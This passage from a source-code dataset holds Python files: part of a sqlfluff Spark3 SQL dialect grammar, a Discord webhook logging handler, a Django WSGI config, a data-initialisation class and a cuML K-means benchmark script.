units\nspark3_dialect.sets(\"datetime_units\").clear()\nspark3_dialect.sets(\"datetime_units\").update(\n [\n \"YEAR\",\n # Alternate syntax for YEAR\n \"YYYY\",\n \"YY\",\n \"QUARTER\",\n \"MONTH\",\n # Alternate syntax for MONTH\n \"MON\",\n \"MM\",\n \"WEEK\",\n \"DAY\",\n # Alternate syntax for DAY\n \"DD\",\n \"HOUR\",\n \"MINUTE\",\n \"SECOND\",\n ]\n)\n\n# Set Keywords\nspark3_dialect.sets(\"unreserved_keywords\").update(UNRESERVED_KEYWORDS)\nspark3_dialect.sets(\"reserved_keywords\").update(RESERVED_KEYWORDS)\n\n# Set Angle Bracket Pairs\nspark3_dialect.sets(\"angle_bracket_pairs\").update(\n [\n (\"angle\", \"StartAngleBracketSegment\", \"EndAngleBracketSegment\", False),\n ]\n)\n\n# Real Segments\nspark3_dialect.replace(\n ComparisonOperatorGrammar=OneOf(\n Ref(\"EqualsSegment\"),\n Ref(\"EqualsSegment_a\"),\n Ref(\"EqualsSegment_b\"),\n Ref(\"GreaterThanSegment\"),\n Ref(\"LessThanSegment\"),\n Ref(\"GreaterThanOrEqualToSegment\"),\n Ref(\"LessThanOrEqualToSegment\"),\n Ref(\"NotEqualToSegment\"),\n Ref(\"LikeOperatorSegment\"),\n ),\n TemporaryGrammar=Sequence(\n Sequence(\"GLOBAL\", optional=True),\n OneOf(\"TEMP\", \"TEMPORARY\"),\n ),\n QuotedIdentifierSegment=NamedParser(\n \"back_quote\",\n CodeSegment,\n name=\"quoted_identifier\",\n type=\"identifier\",\n trim_chars=(\"`\",),\n ),\n)\n\nspark3_dialect.add(\n # Add Hive Segments TODO : Is there a way to retrieve this w/o redefining?\n DoubleQuotedLiteralSegment=NamedParser(\n \"double_quote\",\n CodeSegment,\n name=\"quoted_literal\",\n type=\"literal\",\n trim_chars=('\"',),\n ),\n JsonfileKeywordSegment=StringParser(\n \"JSONFILE\",\n KeywordSegment,\n name=\"json_file\",\n type=\"file_format\",\n ),\n RcfileKeywordSegment=StringParser(\n \"RCFILE\", KeywordSegment, name=\"rc_file\", type=\"file_format\"\n ),\n SequencefileKeywordSegment=StringParser(\n \"SEQUENCEFILE\", KeywordSegment, name=\"sequence_file\", type=\"file_format\"\n ),\n TextfileKeywordSegment=StringParser(\n \"TEXTFILE\", KeywordSegment, name=\"text_file\", type=\"file_format\"\n ),\n StartAngleBracketSegment=StringParser(\n \"<\", SymbolSegment, name=\"start_angle_bracket\", type=\"start_angle_bracket\"\n ),\n EndAngleBracketSegment=StringParser(\n \">\", SymbolSegment, name=\"end_angle_bracket\", type=\"end_angle_bracket\"\n ),\n # Add Spark Segments\n EqualsSegment_a=StringParser(\n \"==\", SymbolSegment, name=\"equals\", type=\"comparison_operator\"\n ),\n EqualsSegment_b=StringParser(\n \"<=>\", SymbolSegment, name=\"equals\", type=\"comparison_operator\"\n ),\n FileKeywordSegment=StringParser(\n \"FILE\", KeywordSegment, name=\"file\", type=\"file_type\"\n ),\n JarKeywordSegment=StringParser(\"JAR\", KeywordSegment, name=\"jar\", type=\"file_type\"),\n WhlKeywordSegment=StringParser(\"WHL\", KeywordSegment, name=\"whl\", type=\"file_type\"),\n # Add relevant Hive Grammar\n BracketedPropertyListGrammar=hive_dialect.get_grammar(\n \"BracketedPropertyListGrammar\"\n ),\n CommentGrammar=hive_dialect.get_grammar(\"CommentGrammar\"),\n FileFormatGrammar=hive_dialect.get_grammar(\"FileFormatGrammar\"),\n LocationGrammar=hive_dialect.get_grammar(\"LocationGrammar\"),\n PropertyGrammar=hive_dialect.get_grammar(\"PropertyGrammar\"),\n SerdePropertiesGrammar=hive_dialect.get_grammar(\"SerdePropertiesGrammar\"),\n StoredAsGrammar=hive_dialect.get_grammar(\"StoredAsGrammar\"),\n StoredByGrammar=hive_dialect.get_grammar(\"StoredByGrammar\"),\n StorageFormatGrammar=hive_dialect.get_grammar(\"StorageFormatGrammar\"),\n 
SingleOrDoubleQuotedLiteralGrammar=hive_dialect.get_grammar(\n \"SingleOrDoubleQuotedLiteralGrammar\"\n ),\n TerminatedByGrammar=hive_dialect.get_grammar(\"TerminatedByGrammar\"),\n # Add Spark Grammar\n BucketSpecGrammar=Sequence(\n Ref(\"ClusterSpecGrammar\"),\n Ref(\"SortSpecGrammar\", optional=True),\n \"INTO\",\n Ref(\"NumericLiteralSegment\"),\n \"BUCKETS\",\n ),\n ClusterSpecGrammar=Sequence(\n \"CLUSTERED\",\n \"BY\",\n Ref(\"BracketedColumnReferenceListGrammar\"),\n ),\n DatabasePropertiesGrammar=Sequence(\n \"DBPROPERTIES\", Ref(\"BracketedPropertyListGrammar\")\n ),\n DataSourceFormatGrammar=OneOf(\n # Spark Core Data Sources\n # https://spark.apache.org/docs/latest/sql-data-sources.html\n \"AVRO\",\n \"CSV\",\n \"JSON\",\n \"PARQUET\",\n \"ORC\",\n \"JDBC\",\n # Community Contributed Data Sources\n \"DELTA\", # https://github.com/delta-io/delta\n \"XML\", # https://github.com/databricks/spark-xml\n ),\n PartitionSpecGrammar=Sequence(\n OneOf(\"PARTITION\", Sequence(\"PARTITIONED\", \"BY\")),\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"ColumnReferenceSegment\"),\n Ref(\"EqualsSegment\", optional=True),\n Ref(\"LiteralGrammar\", optional=True),\n Ref(\"CommentGrammar\", optional=True),\n ),\n ),\n ),\n ),\n ResourceFileGrammar=OneOf(\n Ref(\"JarKeywordSegment\"),\n Ref(\"WhlKeywordSegment\"),\n Ref(\"FileKeywordSegment\"),\n ),\n ResourceLocationGrammar=Sequence(\n \"USING\",\n Ref(\"ResourceFileGrammar\"),\n Ref(\"SingleOrDoubleQuotedLiteralGrammar\"),\n ),\n SortSpecGrammar=Sequence(\n \"SORTED\",\n \"BY\",\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"ColumnReferenceSegment\"),\n OneOf(\"ASC\", \"DESC\", optional=True),\n )\n )\n ),\n optional=True,\n ),\n UnsetTablePropertiesGrammar=Sequence(\n \"UNSET\",\n \"TBLPROPERTIES\",\n Ref(\"IfExistsGrammar\", optional=True),\n Bracketed(Delimited(Ref(\"SingleOrDoubleQuotedLiteralGrammar\"))),\n ),\n TablePropertiesGrammar=Sequence(\n \"TBLPROPERTIES\", Ref(\"BracketedPropertyListGrammar\")\n ),\n)\n\n\n# Hive Segments\n@spark3_dialect.segment()\nclass RowFormatClauseSegment(hive_dialect.get_segment(\"RowFormatClauseSegment\")): # type: ignore\n \"\"\"`ROW FORMAT` clause in a CREATE HIVEFORMAT TABLE statement.\"\"\"\n\n type = \"row_format_clause\"\n\n\n@spark3_dialect.segment()\nclass SkewedByClauseSegment(hive_dialect.get_segment(\"SkewedByClauseSegment\")): # type: ignore\n \"\"\"`SKEWED BY` clause in a CREATE HIVEFORMAT TABLE statement.\"\"\"\n\n type = \"skewed_by_clause\"\n\n\n# Primitive Data Types\n@spark3_dialect.segment()\nclass PrimitiveTypeSegment(BaseSegment):\n \"\"\"Spark SQL Primitive data types.\n\n https://spark.apache.org/docs/latest/sql-ref-datatypes.html\n \"\"\"\n\n type = \"primitive_type\"\n match_grammar = OneOf(\n \"BOOLEAN\",\n # TODO : not currently supported; add segment - see NumericLiteralSegment\n # \"BYTE\",\n \"TINYINT\",\n # TODO : not currently supported; add segment - see NumericLiteralSegment\n # \"SHORT\",\n \"SMALLINT\",\n \"INT\",\n \"BIGINT\",\n \"FLOAT\",\n \"REAL\",\n \"DOUBLE\",\n \"DATE\",\n \"TIMESTAMP\",\n \"STRING\",\n Sequence(\n OneOf(\"CHAR\", \"CHARACTER\", \"VARCHAR\"),\n Bracketed(Ref(\"NumericLiteralSegment\"), optional=True),\n ),\n \"BINARY\",\n Sequence(\n OneOf(\"DECIMAL\", \"DEC\", \"NUMERIC\"),\n Bracketed(\n Ref(\"NumericLiteralSegment\"),\n Ref(\"CommaSegment\"),\n Ref(\"NumericLiteralSegment\"),\n optional=True,\n ),\n ),\n \"INTERVAL\",\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass DatatypeSegment(PrimitiveTypeSegment):\n \"\"\"Spark SQL Data types.\n\n 
https://spark.apache.org/docs/latest/sql-ref-datatypes.html\n \"\"\"\n\n type = \"data_type\"\n match_grammar = OneOf(\n Ref(\"PrimitiveTypeSegment\"),\n Sequence(\n \"ARRAY\",\n Bracketed(\n Ref(\"DatatypeSegment\"),\n bracket_pairs_set=\"angle_bracket_pairs\",\n bracket_type=\"angle\",\n ),\n ),\n Sequence(\n \"MAP\",\n Bracketed(\n Sequence(\n Ref(\"PrimitiveTypeSegment\"),\n Ref(\"CommaSegment\"),\n Ref(\"DatatypeSegment\"),\n ),\n bracket_pairs_set=\"angle_bracket_pairs\",\n bracket_type=\"angle\",\n ),\n ),\n Sequence(\n \"STRUCT\",\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"NakedIdentifierSegment\"),\n Ref(\"ColonSegment\"),\n Ref(\"DatatypeSegment\"),\n Ref(\"CommentGrammar\", optional=True),\n ),\n ),\n bracket_pairs_set=\"angle_bracket_pairs\",\n bracket_type=\"angle\",\n ),\n ),\n )\n\n\n# Data Definition Statements\n# http://spark.apache.org/docs/latest/sql-ref-syntax-ddl.html\n@spark3_dialect.segment()\nclass AlterDatabaseStatementSegment(BaseSegment):\n \"\"\"An `ALTER DATABASE/SCHEMA` statement.\n\n http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-database.html\n \"\"\"\n\n type = \"alter_database_statement\"\n\n match_grammar = Sequence(\n \"ALTER\",\n OneOf(\"DATABASE\", \"SCHEMA\"),\n Ref(\"DatabaseReferenceSegment\"),\n \"SET\",\n Ref(\"DatabasePropertiesGrammar\"),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass AlterTableStatementSegment(BaseSegment):\n \"\"\"A `ALTER TABLE` statement to change the table schema or properties.\n\n http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-table.html\n \"\"\"\n\n type = \"alter_table_statement\"\n\n match_grammar = Sequence(\n \"ALTER\",\n \"TABLE\",\n Ref(\"TableReferenceSegment\"),\n OneOf(\n # ALTER TABLE - RENAME TO `table_identifier`\n Sequence(\n \"RENAME\",\n \"TO\",\n Ref(\"TableReferenceSegment\"),\n ),\n # ALTER TABLE - RENAME `partition_spec`\n Sequence(\n Ref(\"PartitionSpecGrammar\"),\n \"RENAME\",\n \"TO\",\n Ref(\"PartitionSpecGrammar\"),\n ),\n # ALTER TABLE - ADD COLUMNS\n Sequence(\n \"ADD\",\n \"COLUMNS\",\n Bracketed(\n Delimited(\n Ref(\"ColumnDefinitionSegment\"),\n ),\n ),\n ),\n # ALTER TABLE - ALTER OR CHANGE COLUMN\n Sequence(\n OneOf(\"ALTER\", \"CHANGE\"),\n \"COLUMN\",\n Ref(\"ColumnReferenceSegment\"),\n Sequence(\"TYPE\", Ref(\"DatatypeSegment\"), optional=True),\n Ref(\"CommentGrammar\", optional=True),\n OneOf(\n \"FIRST\",\n Sequence(\"AFTER\", Ref(\"ColumnReferenceSegment\")),\n optional=True,\n ),\n Sequence(OneOf(\"SET\", \"DROP\"), \"NOT NULL\", optional=True),\n ),\n # ALTER TABLE - ADD PARTITION\n Sequence(\n \"ADD\",\n Ref(\"IfNotExistsGrammar\", optional=True),\n AnyNumberOf(Ref(\"PartitionSpecGrammar\")),\n ),\n # ALTER TABLE - DROP PARTITION\n Sequence(\n \"DROP\",\n Ref(\"IfExistsGrammar\", optional=True),\n Ref(\"PartitionSpecGrammar\"),\n Sequence(\"PURGE\", optional=True),\n ),\n # ALTER TABLE - REPAIR PARTITION\n Sequence(\"RECOVER\", \"PARTITIONS\"),\n # ALTER TABLE - SET PROPERTIES\n Sequence(\"SET\", Ref(\"TablePropertiesGrammar\")),\n # ALTER TABLE - UNSET PROPERTIES\n Ref(\"UnsetTablePropertiesGrammar\"),\n # ALTER TABLE - SET SERDE\n Sequence(\n Ref(\"PartitionSpecGrammar\", optional=True),\n \"SET\",\n OneOf(\n Sequence(\n \"SERDEPROPERTIES\",\n Ref(\"BracketedPropertyListGrammar\"),\n ),\n Sequence(\n \"SERDE\",\n Ref(\"SingleOrDoubleQuotedLiteralGrammar\"),\n Ref(\"SerdePropertiesGrammar\", optional=True),\n ),\n ),\n ),\n # ALTER TABLE - SET FILE FORMAT\n Sequence(\n Ref(\"PartitionSpecGrammar\", optional=True),\n \"SET\",\n 
\"FILEFORMAT\",\n Ref(\"DataSourceFormatGrammar\"),\n ),\n # ALTER TABLE - CHANGE FILE LOCATION\n Sequence(\n Ref(\"PartitionSpecGrammar\"),\n \"SET\",\n Ref(\"LocationGrammar\"),\n ),\n ),\n )\n\n\n@spark3_dialect.segment()\nclass AlterViewStatementSegment(BaseSegment):\n \"\"\"A `ALTER VIEW` statement to change the view schema or properties.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-view.html\n \"\"\"\n\n type = \"alter_view_statement\"\n\n match_grammar = Sequence(\n \"ALTER\",\n \"VIEW\",\n Ref(\"TableReferenceSegment\"),\n OneOf(\n Sequence(\n \"RENAME\",\n \"TO\",\n Ref(\"TableReferenceSegment\"),\n ),\n Sequence(\"SET\", Ref(\"TablePropertiesGrammar\")),\n Ref(\"UnsetTablePropertiesGrammar\"),\n Sequence(\n \"AS\",\n OptionallyBracketed(Ref(\"SelectStatementSegment\")),\n ),\n ),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass CreateDatabaseStatementSegment(BaseSegment):\n \"\"\"A `CREATE DATABASE` statement.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-database.html\n \"\"\"\n\n type = \"create_database_statement\"\n match_grammar = Sequence(\n \"CREATE\",\n OneOf(\"DATABASE\", \"SCHEMA\"),\n Ref(\"IfNotExistsGrammar\", optional=True),\n Ref(\"DatabaseReferenceSegment\"),\n Ref(\"CommentGrammar\", optional=True),\n Ref(\"LocationGrammar\", optional=True),\n Sequence(\n \"WITH\", \"DBPROPERTIES\", Ref(\"BracketedPropertyListGrammar\"), optional=True\n ),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass CreateFunctionStatementSegment(BaseSegment):\n \"\"\"A `CREATE FUNCTION` statement.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-function.html\n \"\"\"\n\n type = \"create_function_statement\"\n\n match_grammar = Sequence(\n \"CREATE\",\n Sequence(\"OR\", \"REPLACE\", optional=True),\n Ref(\"TemporaryGrammar\", optional=True),\n \"FUNCTION\",\n Anything(),\n )\n\n parse_grammar = Sequence(\n \"CREATE\",\n Sequence(\"OR\", \"REPLACE\", optional=True),\n Ref(\"TemporaryGrammar\", optional=True),\n \"FUNCTION\",\n Ref(\"IfNotExistsGrammar\", optional=True),\n Ref(\"FunctionNameIdentifierSegment\"),\n \"AS\",\n Ref(\"SingleOrDoubleQuotedLiteralGrammar\"),\n Ref(\"ResourceLocationGrammar\", optional=True),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass CreateTableStatementSegment(BaseSegment):\n \"\"\"A `CREATE TABLE` statement using a Data Source or Like.\n\n http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-datasource.html\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-like.html\n \"\"\"\n\n type = \"create_table_statement\"\n\n match_grammar = Sequence(\n \"CREATE\",\n \"TABLE\",\n Ref(\"IfNotExistsGrammar\", optional=True),\n Ref(\"TableReferenceSegment\"),\n OneOf(\n # Columns and comment syntax:\n Sequence(\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"ColumnDefinitionSegment\"),\n Ref(\"CommentGrammar\", optional=True),\n ),\n ),\n ),\n ),\n # Like Syntax\n Sequence(\n \"LIKE\",\n Ref(\"TableReferenceSegment\"),\n ),\n optional=True,\n ),\n Sequence(\"USING\", Ref(\"DataSourceFormatGrammar\"), optional=True),\n Ref(\"RowFormatClauseSegment\", optional=True),\n Ref(\"StoredAsGrammar\", optional=True),\n Sequence(\"OPTIONS\", Ref(\"BracketedPropertyListGrammar\"), optional=True),\n Ref(\"PartitionSpecGrammar\", optional=True),\n Ref(\"BucketSpecGrammar\", optional=True),\n AnyNumberOf(\n Ref(\"LocationGrammar\", optional=True),\n Ref(\"CommentGrammar\", optional=True),\n Ref(\"TablePropertiesGrammar\", optional=True),\n ),\n # Create AS syntax:\n Sequence(\n 
\"AS\",\n OptionallyBracketed(Ref(\"SelectableGrammar\")),\n optional=True,\n ),\n )\n\n\n@spark3_dialect.segment()\nclass CreateHiveFormatTableStatementSegment(hive_dialect.get_segment(\"CreateTableStatementSegment\")): # type: ignore\n \"\"\"A `CREATE TABLE` statement using Hive format.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-hiveformat.html\n \"\"\"\n\n type = \"create_table_statement\"\n\n\n@spark3_dialect.segment(replace=True)\nclass CreateViewStatementSegment(BaseSegment):\n \"\"\"A `CREATE VIEW` statement.\n\n https://spark.apache.org/docs/3.0.0/sql-ref-syntax-ddl-create-view.html#syntax\n \"\"\"\n\n type = \"create_view_statement\"\n\n match_grammar = Sequence(\n \"CREATE\",\n Ref(\"OrReplaceGrammar\", optional=True),\n Ref(\"TemporaryGrammar\", optional=True),\n \"VIEW\",\n Ref(\"IfNotExistsGrammar\", optional=True),\n Ref(\"TableReferenceSegment\"),\n # Columns and comment syntax:\n Sequence(\n Bracketed(\n Delimited(\n Sequence(\n Ref(\"ColumnReferenceSegment\"),\n Ref(\"CommentGrammar\", optional=True),\n ),\n ),\n ),\n optional=True,\n ),\n Ref(\"CommentGrammar\", optional=True),\n Ref(\"TablePropertiesGrammar\", optional=True),\n \"AS\",\n Ref(\"SelectableGrammar\"),\n Ref(\"WithNoSchemaBindingClauseSegment\", optional=True),\n )\n\n\n@spark3_dialect.segment()\nclass DropFunctionStatementSegment(BaseSegment):\n \"\"\"A `DROP FUNCTION` STATEMENT.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-drop-function.html\n \"\"\"\n\n type = \"drop_function_statement\"\n\n match_grammar = Sequence(\n \"DROP\",\n Ref(\"TemporaryGrammar\", optional=True),\n \"FUNCTION\",\n Ref(\"IfExistsGrammar\", optional=True),\n Ref(\"FunctionNameSegment\"),\n )\n\n\n@spark3_dialect.segment()\nclass MsckRepairTableStatementSegment(hive_dialect.get_segment(\"MsckRepairTableStatementSegment\")): # type: ignore\n \"\"\"A `REPAIR TABLE` statement using Hive MSCK (Metastore Check) format.\n\n This class inherits from Hive since Spark leverages Hive format for this command and\n is dependent on the Hive metastore.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-repair-table.html\n \"\"\"\n\n type = \"msck_repair_table_statement\"\n\n\n# Auxiliary Statements\n@spark3_dialect.segment()\nclass AddExecutablePackage(BaseSegment):\n \"\"\"A `ADD JAR` statement.\n\n https://spark.apache.org/docs/latest/sql-ref-syntax-aux-resource-mgmt-add-jar.html\n \"\"\"\n\n type = \"add_executable_package\"\n\n match_grammar = Sequence(\n \"ADD\",\n Ref(\"ResourceFileGrammar\"),\n Ref(\"SingleOrDoubleQuotedLiteralGrammar\"),\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass StatementSegment(BaseSegment):\n \"\"\"Overriding StatementSegment to allow for additional segment parsing.\"\"\"\n\n match_grammar = ansi_dialect.get_segment(\"StatementSegment\").match_grammar.copy()\n\n parse_grammar = ansi_dialect.get_segment(\"StatementSegment\").parse_grammar.copy(\n # Segments defined in Spark3 dialect\n insert=[\n # Data Definition Statements\n Ref(\"AlterDatabaseStatementSegment\"),\n Ref(\"AlterTableStatementSegment\"),\n Ref(\"AlterViewStatementSegment\"),\n Ref(\"CreateHiveFormatTableStatementSegment\"),\n Ref(\"DropFunctionStatementSegment\"),\n Ref(\"MsckRepairTableStatementSegment\"),\n # Auxiliary Statements\n Ref(\"AddExecutablePackage\"),\n ],\n remove=[\n Ref(\"TransactionStatementSegment\"),\n Ref(\"CreateSchemaStatementSegment\"),\n Ref(\"SetSchemaStatementSegment\"),\n Ref(\"CreateExtensionStatementSegment\"),\n Ref(\"CreateModelStatementSegment\"),\n 
Ref(\"DropModelStatementSegment\"),\n ],\n )\n\n\n@spark3_dialect.segment(replace=True)\nclass JoinClauseSegment(BaseSegment):\n \"\"\"Any number of join clauses, including the `JOIN` keyword.\n\n https://spark.apache.org/docs/3.0.0/sql-ref-syntax-qry-select-join.html\n TODO: Add NATURAL JOIN syntax.\n \"\"\"\n\n type = \"join_clause\"\n match_grammar = Sequence(\n # NB These qualifiers are optional\n # TODO: Allow nested joins like:\n # ....FROM S1.T1 t1 LEFT JOIN ( S2.T2 t2 JOIN S3.T3 t3 ON t2.col1=t3.col1) ON tab1.col1 = tab2.col1\n OneOf(\n \"CROSS\",\n \"INNER\",\n Sequence(\n OneOf(\n \"FULL\",\n \"LEFT\",\n \"RIGHT\",\n ),\n Ref.keyword(\"OUTER\", optional=True),\n ),\n Sequence(\n Ref.keyword(\"LEFT\", optional=True),\n \"SEMI\",\n ),\n Sequence(\n Ref.keyword(\"LEFT\", optional=True),\n \"ANTI\",\n ),\n optional=True,\n ),\n Ref(\"JoinKeywords\"),\n Indent,\n Sequence(\n Ref(\"FromExpressionElementSegment\"),\n Conditional(Dedent, indented_using_on=False),\n # NB: this is optional\n OneOf(\n # ON clause\n Ref(\"JoinOnConditionSegment\"),\n # USING clause\n Sequence(\n \"USING\",\n Indent,\n Bracketed(\n # NB: We don't use BracketedColumnReferenceListGrammar\n # here because we're just using SingleIdentifierGrammar,\n # rather than ObjectReferenceSegment or ColumnReferenceSegment.\n # This is a) so that we don't lint it as a reference and\n # b) because the column will probably be returned anyway\n # during parsing.\n Delimited(\n Ref(\"SingleIdentifierGrammar\"),\n ephemeral_name=\"UsingClauseContents\",\n )\n ),\n Dedent,\n ),\n # Unqualified joins *are* allowed. They just might not\n # be a good idea.\n optional=True,\n ),\n Conditional(Indent, indented_using_on=False),\n ),\n Dedent,\n )\n\n get_eventual_alias = ansi_dialect.get_segment(\n \"JoinClauseSegment\"\n ).get_eventual_alias\n"} {"ext": "py", "sha": "1a3063674cfe6bb6c2581bacbbe4161e01ec982e", "content": "\"\"\"A logging handler that emits to a Discord webhook.\"\"\"\nimport requests\nfrom logging import Handler\n\n\nclass DiscordHandler(Handler):\n \"\"\"A logging handler that emits to a Discord webhook.\"\"\"\n\n def __init__(self, webhook, *args, **kwargs):\n \"\"\"Initialize the DiscordHandler class.\"\"\"\n super().__init__(*args, **kwargs)\n self.webhook = webhook\n\n def emit(self, record):\n \"\"\"Emit record to the Discord webhook.\"\"\"\n json = {\"content\": self.format(record)}\n try:\n requests.post(self.webhook, json=json)\n except requests.RequestException:\n self.handleError(record)\n"} {"ext": "py", "sha": "1a306439e1e21796c88bf2b1c2a129203d4a3ca3", "content": "\"\"\"\nWSGI config for pithyquotes project.\n\nIt exposes the WSGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/\n\"\"\"\n\nimport os\n\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pithyquotes.settings')\n\napplication = get_wsgi_application()\n"} {"ext": "py", "sha": "1a3064c7f1f7f412193da4007d0f5810f165c1e5", "content": "\"\"\" Class to initialize common objects. 
\"\"\"\n\nimport pickle\nfrom pathlib import Path\n\n################################################################\nclass Init():\n\n #---------------------------------------------------------------\n # Constructor\n #---------------------------------------------------------------\n def __init__(self, workdir, **kwargs):\n\n print('Init class created.')\n \n self.workdir = Path(workdir)\n self.cachedir = self.workdir / 'cache'\n print('workdir: {}'.format(self.workdir))\n print('cachedir: {}'.format(self.cachedir))\n\n #---------------------------------------------------------------\n # Initialize settings as class members of obj\n #---------------------------------------------------------------\n def Initialize(self, obj):\n\n obj.workdir = self.workdir\n obj.cachedir = self.cachedir\n obj.cachedir.mkdir(parents=True, exist_ok=True)\n\n obj.AllData = pickle.load((obj.workdir / 'default.p').open('rb'))\n\n #: Sets the collision systems for the entire project,\n #: where each system is a string of the form\n #: ``''``,\n #: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``.\n #: Even if the project uses only a single system,\n #: this should still be a list of one system string.\n obj.systems = obj.AllData[\"systems\"]\n\n #: Design attribute. This is a list of\n #: strings describing the inputs.\n #: The default is for the example data.\n obj.keys = obj.AllData[\"keys\"]\n\n #: Design attribute. This is a list of input\n #: labels in LaTeX for plotting.\n #: The default is for the example data.\n obj.labels = obj.AllData[\"labels\"]\n\n #: Design attribute. This is list of tuples of\n #: (min,max) for each design input.\n #: The default is for the example data.\n obj.ranges = obj.AllData[\"ranges\"]\n\n #: Design array to use - should be a numpy array.\n #: Keep at None generate a Latin Hypercube with above (specified) range.\n #: Design array for example is commented under default.\n obj.design_array = obj.AllData[\"design\"]\n\n #: Dictionary of the model output.\n #: Form MUST be data_list[system][observable][subobservable][{'Y': ,'x': }].\n #: 'Y' is an (n x p) numpy array of the output.\n #:\n #: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T.\n #: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example.\n obj.data_list = obj.AllData[\"model\"]\n\n #: Dictionary for the model validation output\n #: Must be the same for as the model output dictionary\n #data_list_val = pickle.load((cachedir / 'model/validation/data_dict_val.p').open('rb'))\n obj.data_list_val = None\n\n #: Dictionary of the experimental data.\n #: Form MUST be exp_data_list[system][observable][subobservable][{'y':,'x':,'yerr':{'stat':,'sys'}}].\n #: 'y' is a (1 x p) numpy array of experimental data.\n #:\n #: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T.\n #:\n #: 'yerr' is a dictionary with keys 'stat' and 'sys'.\n #:\n #: 'stat' is a (1 x p) array of statistical errors.\n #:\n #: 'sys' is a (1 x p) array of systematic errors.\n #: This MUST be changed from None - no built-in default exists. 
Uncomment the line below default for example.\n obj.exp_data_list = obj.AllData[\"data\"]\n\n #: Experimental covariance matrix.\n #: Set exp_cov = None to have the script estimate the covariance matrix.\n #: Example commented below default.\n obj.exp_cov = obj.AllData[\"cov\"]\n\n\n #: Observables to emulate as a list of 2-tuples\n #: ``(obs, [list of subobs])``.\n obj.observables = obj.AllData[\"observables\"]\n\n #---------------------------------------------------------------\n # Initialize settings as class members of obj\n #---------------------------------------------------------------\n def systems(self):\n\n AllData = pickle.load((self.workdir / 'default.p').open('rb'))\n\n #: Sets the collision systems for the entire project,\n #: where each system is a string of the form\n #: ``''``,\n #: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``.\n #: Even if the project uses only a single system,\n #: this should still be a list of one system string.\n return AllData[\"systems\"]\n\n #---------------------------------------------------------------\n # Return formatted string of class members\n #---------------------------------------------------------------\n def __str__(self):\n s = []\n variables = self.__dict__.keys()\n for v in variables:\n s.append('{} = {}'.format(v, self.__dict__[v]))\n return \"[i] {} with \\n . {}\".format(self.__class__.__name__, '\\n . '.join(s))\n"} {"ext": "py", "sha": "1a30660a357a742b4906447a5ec3c5d7baf05f8c", "content": "#===============================================================================\n# Copyright 2020 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#===============================================================================\n\nimport sys\nimport os\nimport argparse\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport bench\n\nimport numpy as np\nfrom cuml import KMeans\nimport warnings\nfrom sklearn.metrics.cluster import davies_bouldin_score\n\nwarnings.filterwarnings('ignore', category=FutureWarning)\nparser = argparse.ArgumentParser(description='cuML K-means benchmark')\nparser.add_argument('-i', '--filei', '--fileI', '--init',\n type=str, help='Initial clusters')\nparser.add_argument('-t', '--tol', type=float, default=0.,\n help='Absolute threshold')\nparser.add_argument('--maxiter', type=int, default=100,\n help='Maximum number of iterations')\nparser.add_argument('--samples-per-batch', type=int, default=32768,\n help='Maximum number of iterations')\nparser.add_argument('--n-clusters', type=int, help='Number of clusters')\nparams = bench.parse_args(parser, prefix='cuml', loop_types=('fit', 'predict'))\n\n# Load and convert generated data\nX_train, X_test, _, _ = bench.load_data(params)\n\nif params.filei == 'k-means++':\n X_init = 'k-means++'\n# Load initial centroids from specified path\nelif params.filei is not None:\n X_init = np.load(params.filei).astype(params.dtype)\n params.n_clusters = X_init.shape[0]\n# or choose random centroids from training data\nelse:\n 
np.random.seed(params.seed)\n centroids_idx = np.random.randint(0, X_train.shape[0],\n size=params.n_clusters)\n if hasattr(X_train, \"iloc\"):\n X_init = X_train.iloc[centroids_idx].to_pandas().values\n else:\n X_init = X_train[centroids_idx]\n\n\n# Workaround for cuML kmeans fail\n# when second call of 'fit' method causes AttributeError\ndef kmeans_fit(X):\n alg = KMeans(n_clusters=params.n_clusters, tol=params.tol,\n max_iter=params.maxiter, init=X_init,\n max_samples_per_batch=params.samples_per_batch)\n alg.fit(X)\n return alg\n\n\n# Time fit\nfit_time, kmeans = bench.measure_function_time(kmeans_fit, X_train, params=params)\ntrain_predict = kmeans.predict(X_train)\n\n# Time predict\npredict_time, test_predict = bench.measure_function_time(kmeans.predict, X_test,\n params=params)\n\nX_train_host = bench.convert_to_numpy(X_train)\ntrain_predict_host = bench.convert_to_numpy(train_predict)\nacc_train = davies_bouldin_score(X_train_host, train_predict_host)\n\nX_test_host = 